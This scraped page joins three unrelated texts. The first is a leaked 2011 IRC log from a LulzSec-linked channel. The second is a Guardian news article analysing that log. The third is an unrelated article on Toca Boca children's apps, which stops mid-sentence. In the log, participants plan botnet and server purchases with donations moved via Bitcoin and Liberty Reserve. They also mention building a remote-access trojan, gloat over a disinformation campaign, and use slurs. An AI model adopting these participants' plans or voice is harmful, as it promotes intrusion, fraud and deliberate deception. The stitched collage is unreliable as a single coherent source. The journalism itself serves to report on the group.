use LRJun 04 17:09:02pwnsauceand my balance is still 0Jun 04 17:09:06*	joepie91 has quit (Ping timeout: 121 seconds)Jun 04 17:09:06joepie92I always do SEPA transfersJun 04 17:09:10*	joepie92 is now known as joepie91Jun 04 17:09:13TopiaryI sent you guys 2 BTCJun 04 17:09:17pwnsauceU5764978Jun 04 17:09:25pwnsaucethat account is the one the LR needs to gotoJun 04 17:10:02lolyeh might just take a while :)Jun 04 17:10:13lolit went to mtgox and i sent to LRJun 04 17:10:26pwnsauceokey :D Il just keep checking :)Jun 04 17:10:45neurongoing from BTC to LR to USD?Jun 04 17:11:04pwnsauceBTC -&gt; LR -&gt; Someone Elses LR i thinkJun 04 17:11:23sabuwe need to own some serious bitcoins .Jun 04 17:12:18pwnsauceayeJun 04 17:12:20pwnsauceSabuJun 04 17:12:23pwnsauceill PMJun 04 17:14:14stormwe have 400+ in donationsJun 04 17:14:56pwnsaucesheeeeetJun 04 17:15:09neuronlol dammn what are we gonna do with it?Jun 04 17:15:09joepie91ok, now I madJun 04 17:15:15joepie91I have issues connecting to shitJun 04 17:15:15joepie91:/Jun 04 17:15:53pwnsauceneuron - buy servers and botsJun 04 17:16:27Topiaryalready sent kayla money for bots, sending Sabu money for servers when he wants itJun 04 17:16:30Topiarywe have 500USD in donationsJun 04 17:16:34*	tflow (bottle_of_@HA-r12.0jd.4c0nch.IP) has joined #pure-eliteJun 04 17:17:28trollpollreally i wonder how ppl supports lulzsec more than Anonymous...Jun 04 17:17:41joepie91that is what I have been wondering aboutJun 04 17:17:42joepie91:/Jun 04 17:18:03trollpollthat makes you think...Jun 04 17:18:30TopiaryLESS THINKING MORE DRINKING!Jun 04 17:19:18trollpollhehe, i drink... beer without alcohol!Jun 04 17:19:31trollpolland grogJun 04 17:20:59joepie91mkJun 04 17:20:59joepie91soJun 04 17:21:03joepie91OpNoPro saysJun 04 17:21:08joepie91that 2 of the people in the dox are correct at leastJun 04 17:21:11joepie91and he doesn't know about the othersJun 04 17:21:12joepie91:pJun 04 17:21:21joepie91also, trollpoll: I drink beer without alcohol occasionallyJun 04 17:21:24&lt;io&gt;	hm in what fox?Jun 04 17:21:27&lt;io&gt;	dox*Jun 04 17:21:30joepie91http://pastebin.com/RBjzDQbSJun 04 17:21:52&lt;io&gt;	wat? how can 2 are correct lulzJun 04 17:22:11joepie91ohwellJun 04 17:22:21joepie91I will just follow his leadJun 04 17:22:21joepie91:DJun 04 17:22:32AvunitTheyre all true!Jun 04 17:22:33Avunitdamnit! D:Jun 04 17:22:38&lt;io&gt;	heh. HE MUST KNOW ITJun 04 17:22:46&lt;io&gt;	HE IS BADASS KINDA_PSEUDO_EX_SPOOKJun 04 17:22:48&lt;io&gt;	or somethingJun 04 17:22:52joepie91alsoJun 04 17:22:55Topiaryhe most know that shit, kayla and I wrote those dox and we HATE LULZSEC FAGGOTSJun 04 17:22:59joepie91people seem to actually believeJun 04 17:23:04joepie91that it's a CIA opJun 04 17:23:07joepie91to show how unsafe the internet isJun 04 17:23:09TopiaryI know, it's brilliantJun 04 17:23:12joepie91and put more restrictions in placeJun 04 17:23:13joepie91my godJun 04 17:23:17joepie91you just tell some bullshit storyJun 04 17:23:23joepie91and people fill in the rest for youJun 04 17:23:24joepie91:DJun 04 17:23:25&lt;io&gt;	as if they would need any excuseJun 04 17:23:29&lt;io&gt;	lol, they make just shit upJun 04 17:23:32neuroni want people to say were aliens!Jun 04 17:23:34&lt;io&gt;	and if in doubt, they use the CP hammerJun 04 17:23:35joepie91io: that's exactly what I have been sayingJun 04 17:23:37joepie91to people who goJun 04 17:23:43joepie91OMG YOU SHOULD NOT HACK FOR FREEDOMJun 04 17:23:46Topiary&lt;parr0t&gt; did he enjoy pay?Jun 04 17:23:47Topiary&lt;whirlpool&gt; definitely; it's a lot of moneyJun 04 17:23:47Topiary&lt;jux&gt; who? what?Jun 04 17:23:47Topiary&lt;whirlpool&gt; TopiaryJun 04 17:23:47Topiary&lt;parr0t&gt; 5000 wowJun 04 17:23:47Topiary&lt;whirlpool&gt; 7500, he wanted moreJun 04 17:23:47joepie91IT WILL ONLY MAKE THEM CLAMP DOWN HARDERJun 04 17:23:49Topiary&lt;whirlpool&gt; couldn't exactly say noJun 04 17:23:51Topiary&lt;parr0t&gt; LOLJun 04 17:23:53Topiary&lt;jux&gt; USD?Jun 04 17:23:54&lt;io&gt;	WE MUST RESTRICTS THE INTERNETZ. THERE IS CP AND TERROR.Jun 04 17:23:55Topiary&lt;whirlpool&gt; yepJun 04 17:23:57Topiary&lt;jux&gt; what for?Jun 04 17:23:59Topiary&lt;whirlpool&gt; private :DJun 04 17:24:01Topiary&lt;jux&gt; lol kJun 04 17:24:03Topiarythis will mindfuck EVERYONEJun 04 17:24:10joepie91yeah, because a government person really cares whether their site is down or not, in pushing a billJun 04 17:24:10joepie91also lolJun 04 17:24:27lolguys i dont think us being on tht irc is a good ideaJun 04 17:24:33lolplease dont follow any of their linksJun 04 17:24:36joepie91what IRC?Jun 04 17:24:38lolthey know what they're doingJun 04 17:24:46joepie91ED?Jun 04 17:24:50lolyehJun 04 17:27:02joepie91can you guys connect to kerpia.cryto.net ?Jun 04 17:27:02joepie91ircJun 04 17:27:26Topiaryeveryone leave ED IRCJun 04 17:27:35Topiarythis is serious, military hackers trying to hack usJun 04 17:27:37Topiarydon't stay thereJun 04 17:28:17pwnsaucei propose Operation:/b/ackraidJun 04 17:28:23pwnsaucewe need .mil targetsJun 04 17:29:12stormhow do you know Topiary?Jun 04 17:29:27Topiarythey were PMing usJun 04 17:29:30Topiaryacting like trollsJun 04 17:29:32stormlogs?Jun 04 17:29:32Topiaryask kaylaJun 04 17:29:38Topiarykayla can you explain?Jun 04 17:29:46stormplease do.Jun 04 17:31:17neuronlol: explain?Jun 04 17:31:19lollook, those mil/fbi trolls are smart, everyone i talked to how claimed to be a hacker knows their shit and it not just pentesting shit i was going over scada which is like automation in machines and vulnerabilities and he was talking about clinet side attacks and shit they know what they're doing and you'd be a fool to think they're not there to pwn youJun 04 17:31:52lolwe dont need to be on tht ircJun 04 17:31:52lolit's not safeJun 04 17:32:00sabustorm, quit with a ping timeoutJun 04 17:32:01lolplease just leave itJun 04 17:32:05neuroni think we should move to our newer ircJun 04 17:32:06stormI did?Jun 04 17:32:21loli really hope no one here has followed any of their links or opened any of their filesJun 04 17:32:29Topiarydon't think soJun 04 17:32:39stormi didntJun 04 17:32:42neuronIm not in there and not oped so i didntJun 04 17:32:53sabuokJun 04 17:33:02sabunow that we had our public face the dayJun 04 17:33:06sabulets focus on our next movesJun 04 17:33:25sabuneuron what are you up to?Jun 04 17:33:28loleveryone just leave tht server forget it existsJun 04 17:33:39neuronSabu: me and pwnsauce are working on a nice RATJun 04 17:33:45joepie91k, so I can't find a route to host... to my own ircJun 04 17:33:45joepie91wat doJun 04 17:33:47neuronthat is my current focusJun 04 17:34:09neuronif im needed else were do tellJun 04 17:34:10lolmost of them were talking really smarmy too like they had somethig on usJun 04 17:34:28lolif someone in this chan got owned we're all compromised nowJun 04 17:34:36neuron0-0\Jun 04 17:34:45sabuok greatJun 04 17:34:53neuronIf you were on that chan and you opened a file. rm your box ploxJun 04 17:35:02stormhow do i make it look like i pinged?Jun 04 17:35:04sabuneuron focus on the ratJun 04 17:35:16sabu/quit Ping timeoutJun 04 17:35:19saburoflJun 04 17:35:19joepie91stormJun 04 17:35:19joepie91noJun 04 17:35:22joepie91stormJun 04 17:35:24stormthats not a ping timeoutJun 04 17:35:25stormlolJun 04 17:35:27joepie91just literally pull your ethernet plugJun 04 17:35:27sabuhes already offJun 04 17:35:29stormthats jsut the reasonJun 04 17:35:30[redacted]SO MUCH FOR OPSECJun 04 17:35:34stormlolJun 04 17:35:37joepie91literally pull your plug lolJun 04 17:35:46stormlol im not on from my home ipJun 04 17:35:48stormyou doofJun 04 17:35:50stormi use shellzJun 04 17:36:08joepie91ah, shell.Jun 04 17:36:09joepie91ye.Jun 04 17:36:10joepie91idkJun 04 17:36:10joepie91lolJun 04 17:36:30joepie91inb4 Ryan ragesJun 04 17:36:36joepie91and baleets fucking everyoneJun 04 17:37:10TopiaryRyan needs a psychologistJun 04 17:37:14TopiaryI will be his psychologistJun 04 17:37:18Topiaryin return for botsJun 04 17:37:20joepie91TopiaryJun 04 17:37:24joepie91don't start throwing chairs againJun 04 17:37:25joepie91kthxJun 04 17:37:27joepie91those things are expensiveJun 04 17:37:40joepie91like, seriouslyJun 04 17:37:46joepie91you smashed a 300 euro chair on Barretts headJun 04 17:37:47joepie91a few days agoJun 04 17:37:48joepie91:|Jun 04 17:38:02Topiaryyou're tripping me out broJun 04 17:38:06joepie91:DJun 04 17:38:40trollpollsabunow that we had our public face the day &lt;--- lol broJun 04 17:38:46joepie91alsoJun 04 17:38:53joepie91just sayingJun 04 17:38:58joepie91I read a blog post yesterdayJun 04 17:39:05joepie91that basically said LulzSec was a very good test to seeJun 04 17:39:09joepie91how anonymous Bitcoin really isJun 04 17:39:15neuron0-0\ good point hahaJun 04 17:39:31joepie91tl;dr we are now lab ratsJun 04 17:39:32tflowlink?Jun 04 17:39:39joepie91lemme see if I can find it in my historyJun 04 17:39:45*	joepie91 opens way too many pages every dayJun 04 17:40:06&lt;io&gt;	yeah i read that tooJun 04 17:40:30&lt;io&gt;	http://techliberation.com/2011/06/03/bitcoin-silk-road-and-lulzsec-oh-my/Jun 04 17:40:35*	lol has quit (Ping timeout: 121 seconds)Jun 04 17:40:42tflowah niceJun 04 17:41:47joepie91fffJun 04 17:41:54joepie91beat me to itJun 04 17:41:55joepie91:(Jun 04 17:42:57&lt;io&gt;	joepie91google bitcoin lulzsec anonymous :pJun 04 17:43:10&lt;io&gt;	faster than history hehJun 04 17:43:22joepie91ye I did thatJun 04 17:43:26joepie91&gt;.&gt;Jun 04 17:43:58&lt;io&gt;	then you must type like my mom :DJun 04 17:44:15*	trollpoll has quit (Ping timeout: 121 seconds)Jun 04 17:44:39joepie91notrlyJun 04 17:44:42joepie91lolJun 04 17:44:46joepie91this vpn node sucksJun 04 17:44:53joepie91I can't even connect to my own ircJun 04 17:44:54joepie91:|Jun 04 17:45:01joepie91No route to hostJun 04 17:48:04joepie91this is almost scaryJun 04 17:48:11joepie91other person: I'm fapping, don't interrupt meJun 04 17:48:16joepie91me: mk, cam, wanna seeJun 04 17:48:21joepie91other person: really? :o secJun 04 17:48:44neuronwtf'Jun 04 17:49:29*	trollpoll (trollpoll@HA-9fh.11n.cc0br2.IP) has joined #pure-eliteJun 04 17:50:28sabujoepie use the other vpn hostsJun 04 17:50:37stormhalfdead is good pplzJun 04 17:50:40sabuyoure telling me out the 80 vpn hosts hma hasJun 04 17:50:41stormi see the pastebinJun 04 17:50:46sabunone of them connect?Jun 04 17:51:00neuronstorm: halfdead?Jun 04 17:51:04joepie91Sabu: actually after I typed that shit I connected to my IRCJun 04 17:51:06joepie91idk what was wrongJun 04 17:51:13joepie91and I don't like switching VPNs, all my shit has to reconnectJun 04 17:51:14joepie91and shitJun 04 17:51:50[redacted]90% of the IRC's convo is joepie saying stuffJun 04 17:51:51[redacted]:]Jun 04 17:51:52stormuesJun 04 17:51:54stormyesJun 04 17:52:01stormhes a friend from #phrackJun 04 17:52:03stormhes hardcoreJun 04 17:52:21joepie91[redacted]: I know, I'm very talkativeJun 04 17:52:24joepie91a bit too talkative sometimesJun 04 17:52:31joepie91on the other hand, works fairly well to gather intel :)Jun 04 17:53:33sabusup [redacted] you sexy ass nigJun 04 17:53:38stormsabuJun 04 17:53:42stormdid you see this pastebin yet?Jun 04 17:53:52stormhttp://pastebin.com/RBjzDQbSJun 04 17:54:03&lt;io&gt;	he's op in #phrack on efnetJun 04 17:54:12&lt;io&gt;	which is not the ezine btw but the groupJun 04 17:54:22stormi know who he isJun 04 17:54:23storm;pJun 04 17:54:30&lt;io&gt;	someone asked aboveJun 04 17:54:35stormhe is friends with 2l8Jun 04 17:54:36stormahJun 04 17:54:40&lt;io&gt;	neuron.. was just adding my info :)Jun 04 17:54:46neuronlolJun 04 17:54:47storm:pJun 04 17:55:16joepie91meh.Jun 04 17:55:18joepie910.79mbpsJun 04 17:55:25joepie91methinks I'm going to try a different vpn nodeJun 04 17:55:28joepie91in a bitJun 04 17:55:29joepie91:PJun 04 17:56:10sabutrueJun 04 17:56:19trollpollman, this pastebin is very coolJun 04 17:56:21trollpollwho rote?Jun 04 17:56:25trollpollwrote*Jun 04 17:56:42stormhmJun 04 17:57:23*	joepie92 (joepie91@HA-u3g.pbq.j3hiks.IP) has joined #pure-eliteJun 04 17:58:10stormjux probablyJun 04 17:58:20stormmust be an agentJun 04 17:59:27trollpollok, so, here who is from CIA?Jun 04 17:59:31*	joepie91 has quit (Ping timeout: 121 seconds)Jun 04 17:59:35trollpoll:)Jun 04 18:16:49*	Disconnected (Invalid argument).**** ENDING LOGGING AT Sat Jun  4 18:16:49 2011**** BEGIN LOGGING AT Sat Jun  4 18:17:02 2011Jun 04 18:17:02*	Now talking on #pure-eliteJun 04 18:17:02*	Topic for #pure-elite is: pE | Research and exploit development | Coding, designing, penetrating, packeting, laughing at our crippled opponentsJun 04 18:17:02*	Topic for #pure-elite set by Topiary!t@HA-p22.rkn.75e5ku.IP at Fri Jun  3 17:06:56 2011Jun 04 18:18:00*	neuron listens to wub wub wubJun 04 18:18:04loli dont understand this open letter wht is it trying to say?Jun 04 18:18:06lol:oJun 04 18:18:21joepie91I'll talk to jaromilJun 04 18:18:33joepie91he seems to not get a few thingsJun 04 18:18:34joepie91&gt;.&gt;Jun 04 18:18:40trollpollis out of contextJun 04 18:19:20joepie91I get his pointJun 04 18:19:21joepie91howeverJun 04 18:19:34joepie91With its dramatic announcementJun 04 18:19:34joepie91the LoU played into the hands of policy makers who want completeJun 04 18:19:34joepie91control over the Internet and are looking for reasons to seize it.Jun 04 18:20:00joepie91that is the same argument as "by taking down shit you only give them more reason to crack down"Jun 04 18:20:12joepie91which is, imo, plain bullshitJun 04 18:20:41loli think stuxnet proved the internet is not needed to engage in cyber warJun 04 18:20:58trollpollI love this ending "Now we are all sons of bitches"Jun 04 18:21:07trollpollis epicJun 04 18:22:00&lt;io&gt;	also, they do already have laws against hacking. all they do is whine now.. and what's ther bigges action? they call it now war. or terrorism even, whatever.Jun 04 18:22:05&lt;io&gt;	it doesn't help them with their problemJun 04 18:22:18&lt;io&gt;	that worked in afghanistan or iraq cause they needed legitimation to raidJun 04 18:22:24&lt;io&gt;	but wat now? invade the internet?Jun 04 18:22:42&lt;io&gt;	and they cant restrict it the way they would like toJun 04 18:22:46&lt;io&gt;	ecomomics would crashJun 04 18:22:52trollpollthats the term "invade", all of us, thinks that internet is a real independent stateJun 04 18:22:57trollpoll(all of us?)Jun 04 18:23:21trollpollso, any state invaded will try to defenseJun 04 18:23:30trollpolland obviously, counter attackJun 04 18:23:41&lt;io&gt;	yup, internet is very similar to a sateJun 04 18:23:56&lt;io&gt;	it state*Jun 04 18:24:00&lt;io&gt;	gah.Jun 04 18:24:19trollpollof course they started the war, trying to politice internet, and trying to impose their lawJun 04 18:24:54joepie91yaJun 04 18:25:06joepie91it would be funny if it weren't so sadJun 04 18:25:16joepie91to see how corporations are trying to "claim" the internetJun 04 18:25:24lolok so has everyone left tht irc now?Jun 04 18:25:25trollpollyesJun 04 18:25:25joepie91as if it's their exclusive distribution platformJun 04 18:25:38joepie91it wasn't made this way for them in the first place, damnitJun 04 18:26:05trollpollthats it, they are trying to convert internet in a "desktop app" with as many links as you can payJun 04 18:26:25joepie91yaJun 04 18:26:38joepie91corporations should realize the internet isn't theirsJun 04 18:26:44joepie91and I don't mean the physical tubesJun 04 18:26:48joepie91but the actual internetJun 04 18:26:51joepie91the community, idea, conceptJun 04 18:27:25trollpollyes, the utopie is to create a new internet... corporation freeJun 04 18:27:40trollpollusing each one its infrastructuresJun 04 18:28:32trollpollor perhaps, a big corp like google inverting in infrastructuresJun 04 18:28:48trollpollinverting?Jun 04 18:28:51trollpoll...Jun 04 18:30:00joepie91myeJun 04 18:30:00joepie91alsoJun 04 18:30:03joepie91what the fuckJun 04 18:30:08joepie91what is with all these companies and orgsJun 04 18:30:09joepie91going allJun 04 18:30:14joepie91OMG WE NEED A NEW DESKTOP EXPERIENCEJun 04 18:30:16joepie91first UnityJun 04 18:30:17joepie91then GNOME3Jun 04 18:30:20joepie91now Windows 8?Jun 04 18:30:24joepie91http://www.youtube.com/watch?v=8upI6M4T92UJun 04 18:30:33joepie91this shit is as counterproductive as possibly can be, my godJun 04 18:30:58joepie91it's the web 2.0 of the desktop OS -_-Jun 04 18:31:47pwnsaucei used win8 leakedJun 04 18:31:49pwnsauceis very gayJun 04 18:32:03Topiarywhat the fuck is that, Kinect on steroids?Jun 04 18:32:06trollpollof course they want to convert a pc in an iphoneJun 04 18:32:19Topiaryseriously I'm mad at all this stupid waggle-your-arms-to-pet-tiger technologyJun 04 18:32:30joepie91yaJun 04 18:32:38joepie91seriouslyJun 04 18:32:40joepie91web 2.0Jun 04 18:32:43joepie91now on your desktop OSJun 04 18:32:44*	Topiary is a beast with the mouse/keyboard/gamepadJun 04 18:32:50joepie91you know what's the worst?Jun 04 18:32:57joepie91linux was the goddamn first OS to have this stupid crapJun 04 18:33:02trollpollppl will love...Jun 04 18:33:04joepie91Unity, GNOME3...Jun 04 18:33:28joepie91trollpoll: people love anyting as long as the buzzword:crash ratio is above 1Jun 04 18:33:35joepie91anything*Jun 04 18:33:54trollpollyears ago i was talking about this, someone told me, web browsers are the SO of the futureJun 04 18:34:02Topiarypeople love anything they can virtually drag their fat finger across, as long as it makes a contrail behind it in shiny effectsJun 04 18:34:28stormi love pornJun 04 18:34:45neuroni agree with stormJun 04 18:34:48neuronhe makes a valid poinJun 04 18:35:04lollol :DJun 04 18:35:04trollpollok, i got it, stop talking about shitJun 04 18:35:20trollpolleverybody knows, internet is for pr0nnnnJun 04 18:36:17trollpoll(but after few years storm, you will have a unique destktop application called porn and you will pay for that)Jun 04 18:36:25trollpollxDDJun 04 18:36:53joepie91po.rnJun 04 18:37:16lolewww pron is disgusting :OJun 04 18:37:19lolxDJun 04 18:37:53pwnsaucejoepie91 - reg that domain and fill it with shock videos xDJun 04 18:38:18joepie91lolJun 04 18:38:19joepie91alsoJun 04 18:38:22joepie91I am going to take a stabJun 04 18:38:31joepie91and say that Windows 8 uses TridentJun 04 18:38:34joepie91to render the new touch UI shitJun 04 18:38:38joepie91aka internet explorerJun 04 18:38:46joepie91with only support for HTML5 and SilverlightJun 04 18:38:51joepie91as well as .NET integrationJun 04 18:38:58joepie91that IE will thus be integrated deeply into the systemJun 04 18:38:59trollpollsilverlight... who the fuck uses this shit?Jun 04 18:39:00pwnsauceit supports vb6 binaries stillJun 04 18:39:03joepie91not only meaning you can't get rid of itJun 04 18:39:05pwnsaucewe testedJun 04 18:39:08joepie91but also meaningJun 04 18:39:16joepie91that IE is yet again deeply integrated into the systemJun 04 18:39:20joepie91introducing a buttload of new vulnerabilitiesJun 04 18:39:34joepie91let's see when the final release comes out, if the above is accurate.Jun 04 18:39:36trollpollgood pointJun 04 18:39:43joepie91they did it before, wouldn't be surprised if they did it again.Jun 04 18:40:00joepie91remember windows 95/98(?) and the IE integraten?Jun 04 18:40:03joepie91integration*Jun 04 18:40:15trollpollmicrosoft has imrpoved their security very very well in tha last few yearsJun 04 18:40:43joepie91yes, but a bit less bad doesn't make it goodJun 04 18:41:02joepie91if IE is gonna be this deeply integrated, I guarantee you that there will be shitloads of holesJun 04 18:41:04trollpollbut obviously, being the most used SO in the world, makes the cake bigger for researchersJun 04 18:41:52pwnsauceMORE CAKE!**** ENDING LOGGING AT Sat Jun  4 18:42:02 2011
It was a tight-knit and enigmatic group finding its feet in the febrile world of hacker collectives, where exposing and embarrassing your targets is just as important as protecting your own identity.But leaked logs from LulzSec's private chatroom – seen,and published today, by the Guardian – provide for the first time a unique, fly-on-the-wall insight into a team of audacious young hackers whose inner workings have until now remained opaque.LulzSec is not, despite its braggadocio, a large – or even coherent – organisation. The logs reveal how one hacker known as "Sabu", believed to be a 30-year-old security consultant, effectively controls the group of between six and eight people, keeping the others in line and warning them not to discuss what they have done with others; another, "Kayla", provides a large botnet – networks of infected computers controlled remotely – to bring down targeted websites with distributed denial of service (DDoS) attacks; while a third, "Topiary", manages the public image, including theLulzSec Twitter feed.They turn out to be obsessed with their coverage in the media, especially in physical newspapers, sharing pictures of coverage they have received in the Wall Street Journal and other papers. They also engineered a misinformation campaign to make people think they are a US-government sponsored team.They also express their enmity towards a rival calledThe Jester– an ex-US military hacker who usually attacks jihadist sites, but has become embroiled in a dispute with Anonymous, WikiLeaks and LulzSec over the leaked diplomatic cables and, more recently, LulzSec's attacks on US government websites, including those of the CIA and the US Senate.In a further sign that the spotlight is beginning to engulf LulzSec,a lone-wolf hacker managed to temporarily cripple the group's websiteon Friday morning. Originally thought to be the work of The Jester, an activist, known as Oneiroi, later claimed responsibility for the attack but did not provide an explanation.The group's ambitions went too far for some of its members: when the grouphit an FBI-affiliated site on 3 June, two lost their nerve and quit, fearing reprisals from the US government. After revealing that the two, "recursion" and "devrandom" have quit, saying they were "not up for the heat", Sabu tells the remaining members: "You realise we smacked the FBI today. This means everyone in here must remain extremely secure."Another member, "storm", then asks worriedly: "Sabu, did you wipe the PBS bd [board] logs?", referring to anattack by LulzSec on PBS on 29 May, when they planted a fake story that the dead rapper Tupac Shakur was alive. If traces remained there of the hackers' identities, that could lead the FBI to them."Yes," Sabu says. "All PBS logs are clean." Storm replies: "Then I'm game for some more." Sabu says: "We're good. We got a good team here."Documenting a crucial five-day period in the group's early development from 31 May to 4 June, the logs – whose authenticity has been separately confirmed through comments made online by LulzSec's members – are believed to have been posted online by a former affiliate named "m_nerva". They contain detailed conversations between the group, who have in recent weeks perpetrated a series of audacious attacks on a range of high-profile targets, including Sony, the CIA, the US Senate, and the UK's Serious Organised Crime Agency (SOCA).LulzSec threatened m_nerva on Tuesday in atweetsaying "Remember this tweet, m_nerva, for I know you'll read it: your cold jail cell will be haunted with our endless laughter. Game over, child." As an explanation, theysaid: "They leaked logs, we owned them [took over their computer], one of them literally started crying for mercy". The leaked logs are the ones seen by the Guardian.The conversations confirm that LulzSec has links with – but is distinct from – the notorious hacker group Anonymous. Sabu, a knowledgeable hacker, emerges as a commanding figure who issues orders to the small, tight-knit team with striking authority.Despite directing the LulzSec operation, Sabu does not appear to engage in the group's public activity, and warns others to be careful who and how they talk outside their private chatroom. "The people on [popular hacker site] 2600 are not your friends," Sabu warns them on 2 June. "95% are there to social engineer [trick] you, to analyse how you talk. I am just reminding you. Don't go off and befriend any of them."But the difficulty of keeping their exploits and identities secret proves difficult: Kayla is accused of giving some stolen Amazon voucher codes to someone outside the group, which could lead back to one of their hacks. "If he's talking publicly, Kayla will talk to him," Sabu comments, bluntly.Topiary, who manages the public image of LulzSec – which centres around its popular Twitter feed, with almost 260,000 followers – also acted previously as a spokesman for Anonymous, once going head-to-head in alive video with Shirley Phelps-Roper of the controversial Westboro Baptist Church, during which he hacked into the church's website mid-interview.His creative use of language and sharp sense of humour earns praise from his fellow hackers in the chat logs, who tell him he should "write a fucking book". On one occasion, after a successful DDoS attack brings down a targeted web server, Topiary responds in characteristic fashion to the hacker responsible, Storm: "You're like our resident sniper sitting in the crow's nest with a goddamn deck-shattering electricity blast," he writes. "Enemy ships being riddled with holes."But while LulzSec has a jovial exterior, and proclaims that its purpose is to hack "for the lulz" (internet slang for laughs and giggles), Sabu is unremittingly serious. Domineering and at times almost parental, he frequently reminds the other hackers of the dangers of being tracked by the authorities, who the logs reveal are often hot on their heels.During one exchange, a hacker named Neuronstarts an IAmA (Q and A) sessionfor LulzSec on the website Reddit for "funzies" and to engage with the public. This immediately raises the ire of Sabu, who puts an angry and abrupt halt to it."You guys started an IAmA on reddit?" Sabu asks in disbelief. "I will go to your homes and kill you. If you really started an IAmA bro, you really don't understand what we are about here. I thought all this stuff was common knowledge ... no more public apperances [sic] without us organizing it."He adds: "If you are not familiar with these hostile environments, don't partake in it."The logs also reveal that the group began a campaign of disinformation around LulzSec. Their goal was to convince – and confuse – internet users into believing a conspiracy theory: that LulzSec is in fact a crack team of CIA agents working to expose the insecurities of the web, headed by Adrian Lamo, the hacker who reported the alleged WikiLeaks whistleblower Bradley Manning to the authorities."You guys are claiming that LulzSec is a CIA op ... that Anonymous is working to uncover LulzSec ... that Adrian Lamo is at the head of it all ... and people actually BELIEVE this shit?" writes joepie91, another member. "You just tell some bullshit story and people fill in the rest for you.""I know, it's brilliant," replies Topiary. The attempts did pay off, withsome bloggerspassing comments such as: "I hypothesize that this is a government 'red team' or 'red cell' operation, aimed at building support for government intervention into internet security from both the public and private sectors."The group monitors news reports closely, and appears to enjoy – even thrive – on the publicity its actions bring. But the logs show that the members are frustrated by the efforts of a self-professed "patriot-hacker" known as the Jester (or th3j35t3r), whose name is pejoratively referenced throughout.The Jester is purportedly an ex-US military hacker, and was responsible for high-profile attacks on WikiLeaks prior to the release of US diplomatic cables in November. In recent weeks he has made LulzSec his principal target,describing them as "common bullies". Topiary in turn dismisses The Jester as a "pompous elitism-fuelling blogger" – but the group is always worried that The Jester or his associates are trying to track them down.The Jester claims LulzSec are motivated by money and points toallegationsthat the group tried to extort money from Unveillance, a data security company. Similar accusations against LulzSec by two other groups, "Web Ninjas" and "TeaMp0isoN_". Web Ninjas say they want to see LulzSec "behind bars" for committing "insane acts ... in the name of publicity or financial gain or anti-govt agenda".The logs do not reveal any discussion of extortion between the LulzSec inner circle; nor do they indicate any underlying political motivations for the attacks. But amid the often tense atmosphere depicted in the logs the hackers do occasionally find time to talk politics."One of these days we will have tanks on our homes," writes trollpoll, shortly after it emerged theUS government was reclassifying hacking as a possible act of war. "Yea, no shit," responds Storm."Corporations should realize the internet isn't theirs," adds joepie91. "And I don't mean the physical tubes, but the actual internet ... the community, idea, concept.""Yes, the utopia is to create a new internet," says trollpoll. "Corporation free."On Monday 20 June, Sabu's worst fears may have been confirmed when a19-year-old named Ryan Cleary was arrested in Wickford, Essexand later charged with a cyber attack in connection with a joint Scotland Yard and FBI probe in to a hacking group believed to be LulzSec.Metropolitan Police Commissioner Sir Paul Stephenson described the arrest as "very significant", though LulzSec itself was quick to claim Cleary was not a member of the group and had only allowed it to host "legitimate chatrooms" on his server."Clearly the UK police are so desperate to catch us that they've gone and arrested someone who is, at best, mildly associated with us," the group tweeted.An individual named "Ryan" is occasionally referenced by the hackers in the logs, though he himself does not feature and appears to have only a loose association with the group.Scotland Yard confirmed on Thursday that it was continuing to work with "a range of agencies" as part of an "ongoing investigation into network intrusions and distributed denial of service attacks against a number of international business and intelligence agencies by what is believed to be the same hacking group".In response to the leaked logs, LulzSecposted a statementon the website pastebin, claiming users named joepie91, Neuron, Storm and trollpoll were "not involved with LulzSec" and rather "just hang out with us".They added: "Those logs are primarily from a channel called #pure-elite, which is /not/ the LulzSec core chatting channel. #pure-elite is where we gather potential backup/subcrew research and development battle fleet members – ie, we were using that channel only to recruit talent for side-operations."The group has vowed to continue its actions undeterred. But they now face a determined pincer movement from the FBI, UK police, and other hackers – including The Jester, who has been relentless in his pursuit of them for more than a fortnight. If its members' real identities are revealed, LulzSec may vanish as quickly as it rose to prominence.
Before Apple's original iPad went on sale, the notion that parents would hand over their shiny new tablet to sticky-fingered children seemed ridiculous. Now it's that assumption that looks risible, for there is a burgeoning market in apps aimed at kids – a trend that extends to iPhone and other smartphones.One of the developers currently creating a buzz around its kid-apps isToca Boca. Based in Sweden, the studio is part of media company Bonnier Group, which is better known for its newspaper, magazine, television and cinema businesses.Toca Boca has been winning parental praise for a series of apps, includingPaint My Wings,Toca Tea PartyandToca Hair Salon. They're not games or book-apps – the two most popular genres for apps aimed at children – but are described by the developer as digital toys."We started off by looking at the different ways kids like to play in the real world," says chief executive Björn Jeffery, who outlines several kinds. Active play is sports and general running around; make-believe play can be dolls and role-playing; manipulative play is building and making; creative play is drawing, painting and music; and learning play is games and books."We realised that 85% of what was in the App Store [for kids] was in the learning play category," says Jeffery. "That seems strange until you realise that this is the type of play that adults do: we play games and read books, but we don't play with dolls all that often! There is something lacking there. And that's what led to us exploring the more uncharted areas of play, looking at toys rather than games."Toca Boca's apps are open-ended: no winning or losing, high scores or time limits. They have beautifully crafted graphics, but are also tightly focused. Toca Hair Salon involves cutting and styling the hair of four characters, while Paint My Wings invites users to paint the wings of a pair of butterflies."We test with kids two or three times during the development process to validate the concept – what's fun about drawing on the wings of butterflies? – and we are trying to take these tiny little concepts, and make them really good, so that kids love them," says Jeffery.Toca Boca has been clever about the relative lack of speech or text within the games, which means they can be sold around the world with the minimum of localisation. Toca Hair Salon has been bought in more than 70 countries, even topping Apple's Top Paid chart in Kuwait. That experience colours Jeffery's views on the App Store itself."The market itself is slightly broken, in that there is a large supply of apps, and sufficient demand – a lot of kids – but the problem is the discoverability in the middle," he says."The supply and demand don't really meet, and there is not even a Kids category in the App Store. At the same time, once you actively skew your apps to reach the whole world, the App Store is great. How could we have possibly sold in 70 markets in two weeks with relatively limited marketing before?"Toca Boca also has some strong principles at work behind its applications. One is that the studio does not see kid-apps as pacifiers, used as a substitute for playing with their children. Jeffery says he has nothing against passing an iPhone to a grumbling child in the back of a car to keep them occupied, but is hoping for a different usage pattern from his company's apps."There is a time and a place for the pacifier idea, but it's quite a limiting way of looking at the segment. We think you can make these apps as fun for parents as for children, and when the two can play together, it can be a very powerful thing. iPad is a family-oriented device, as opposed to the iPhone, which is a very personal device."Toca Tea Party is a good example. The iPad app is a tea party, where children drag plates, cups and biscuits around a virtual table, eating and drinking with their fingers. The point being that the items are virtual, but the tea party participants are real: the child, siblings and/or friends, and family members.Jeffery talks of being sent videos of children using the app to have a tea party with grandparents, 